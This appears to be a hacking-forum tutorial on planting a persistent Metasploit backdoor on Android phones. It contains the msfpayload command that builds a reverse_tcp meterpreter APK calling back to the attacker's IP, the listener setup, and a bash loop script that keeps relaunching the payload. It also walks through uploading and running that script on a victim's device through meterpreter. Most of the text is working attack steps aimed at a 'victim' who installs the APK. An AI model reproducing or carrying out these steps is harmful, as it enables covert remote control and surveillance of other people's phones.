How to Create a Persistent Back Door in Android Using Kali Linux

Step 1: Fire Up Kali and Hack an Android System:

Use this guide to hack an android system on LAN.
I'll be hacking on WAN, using a VM.
  • Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk
  • Now, lets set-up a Listener:
  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set LHOST 192.168.0.4
  • exploit
After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...

Step 2: Create a Persistent Script:

Here.. Copy these commands in a notepad to create a script, and save it as anything.sh (The file extension .sh is important!)
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
(Don't copy these lines "-----" also, there are no line breaks in the 3rd and the 4th line, they are a single line)
(The first line #!/bin/bash is also important as it recognizes the script as a bash shell script)
(You can set the sleep to any amount of seconds you want the script to sleep)
Move/Copy this to the Home/Root folder of KALI.
--------------------------------------------------------------------------------------------------------
Updated Script v3 (Compatible with any android version)
CRITICAL: DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT (may) WON'T WORK /!\
..I guess, you will have to write it on your own.. (Don't ask me why..)
Code:
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
There is a 'space' between 'while' and ':'
NO Multiple spaces in the script.
NO Line Break between 3rd and 4th line. (So a total of 5 lines)

Step 3: Upload It to the Hacked Android System:

You need to upload the shell script to etc/init.d/ so that it is persistent even after Reboot!
To do this, navigate to the directory using the following commands:
  • cd /
Now you should be in the ROOT directory, you can check by typing:
  • ls
Now type:
  • cd etc
Check again by typing:
  • ls
Again change directory:
  • cd init.d
  • ls
Here we are...

Time to Upload the Shell Script:

Do this by typing:
  • upload anything.sh
What the? No! We need Root Access to complete this command! Darn!

Never-Mind:

> Lets just make the application (i.e. Main Activity) persistent until Reboot
> However, it will not be persistent after the android system on the Victim goes for a Reboot.
> To do this upload the script anywhere in the sdcard:
  • cd /
  • cd /sdcard/Download
  • ls
  • upload anything.sh
Done! Uploaded!

Step 4: Execute the Script:

Now, all we have to do is execute the script once, and then everything will be done by the script automatically.
Drop into the system's shell by typing:
  • shell
Now, navigate to the location of the script:
  • cd /
  • cd /sdcard/Download
  • ls
Now its time for EXECUTION. Type:
  • sh anything.sh
The script has been Activated! All you have to do is press ctrl+C to terminate the shell (Don't worry the script is still running)
Reboot to eliminate the script or use Task Killer

Step 5: Testing...

You can test it by exiting from meterpreter and again setting up a Listener.
You should get a meterpreter prompt automatically!
PROOF:
Wow! It happened so Fast that 3 sessions got opened one after another.
(I know that the above picture shows that I am hacking on LAN instead of WAN as my Public IP is dynamic and my router had some technical problems, so it kept rebooting itself, so I showed t on LAN, BUT no worries I have tested it on WAN, works Fine )

The END:

Yes! Finally a persistent backdoor has been created successfully for Android systems.

Things to Remember:

  • The persistence of the backdoor will only remain until a reboot of the android system.
  • If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
  • Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.
  • If the Victim's Android system is Rooted and your Public IP is Static, then:
1)The Persistence will remain forever on WAN!
2)The Persistence will remain forever on LAN Obviously

Good-Bye Hackers!

Keep Coming For More!
I'll be waiting for Your Likes and Comments,
Thank You,